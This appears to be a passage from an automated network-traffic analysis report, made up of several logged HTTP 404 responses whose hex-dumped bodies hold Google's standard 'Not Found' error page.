7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 